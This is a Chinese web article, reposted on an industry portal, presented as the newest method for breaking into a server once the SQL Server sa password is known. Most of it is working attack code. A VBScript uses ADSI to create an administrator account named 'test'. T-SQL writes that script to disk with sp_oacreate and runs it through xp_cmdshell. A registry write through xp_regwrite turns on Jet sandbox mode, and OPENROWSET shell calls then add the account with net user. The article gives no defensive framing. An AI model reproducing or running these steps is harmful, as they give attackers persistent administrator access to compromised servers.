您好,欢迎访问一九零五行业门户网

SQL Server SA权限最新入侵方法_MySQL

bitscn.com
    在获得sa密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道vbs在活动目录(adsi)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠cmd等命令就能添加一个管理员,具体代码如下:
set wsnetwork=createobject(wscript.network)
os=winnt://&wsnetwork.computername
set ob=getobject(os) '得到adsi接口,绑定
set oe=getobject(os&/administrators,group) '属性,admin组
set od=ob.create(user,test) '建立用户
od.setpassword 1234 '设置密码
od.setinfo '保存
set of=getobject(os&/test,user) '得到用户
oe.add os&/test
将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:/1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', null,'set wsnetwork=createobject
(wscript.network)'
exec @ret = sp_oamethod @f, 'writeline', null,'os=winnt://&wsnetwork.
computername'
exec @ret = sp_oamethod @f, 'writeline', null,'set ob=getobject(os)'
exec @ret = sp_oamethod @f, 'writeline', null,'set oe=getobject
(os&/administrators,group)'
exec @ret = sp_oamethod @f, 'writeline', null,'set od=ob.create
(user,test)'
exec @ret = sp_oamethod @f, 'writeline', null,'od.setpassword 1234'
exec @ret = sp_oamethod @f, 'writeline', null,'od.setinfo '
exec @ret = sp_oamethod @f, 'writeline', null,'set of=getobject
(os&/test,user) '
exec @ret = sp_oamethod @f, 'writeline', null,'oe.add os&/test'
执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:/1.vbs正被另一个程序运行”而无法成功添加用户:
exec master..xp_cmdshell 'cscript c:/1.vbs'
如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为:
exec master..xp_cmdshell 'echo set wsnetwork=createobject(wscript.network)
>>1.vbs'
不过,不知道为什么所有带“&”字符的命令行都无法写入1.vbs,感兴趣的朋友可以尝试解决一下。
使用jet沙盘模式,可以解决xp_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因,系统默认情况下沙盘模式未开启,这就需要xp_regwrite开启沙盘模式:
exec master.dbo.xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0
/engines','sandboxmode','reg_dword',1
然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows
/system32/ias/ias.mdb','select shell(cmd.exe /c net user test 1234 /add)')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows
/system32/ias/ias.mdb','select shell(cmd.exe /c net localgroup
administrators test /add)')
不同的操作系统,路径也不一样,需要根据情况做修改:
bitscn.com
其它类似信息

推荐信息